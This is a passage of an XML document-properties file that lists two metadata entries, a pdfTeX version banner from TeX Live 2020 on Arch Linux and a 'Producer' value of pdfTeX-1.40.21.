  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="PTEX.Fullbanner">
    <vt:lpwstr>This is pdfTeX, Version 3.14159265-2.6-1.40.21 (TeX Live 2020/Arch Linux) kpathsea version 6.3.2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Producer">
    <vt:lpwstr>pdfTeX-1.40.21</vt:lpwstr>
  </property>
</Properties>
</file>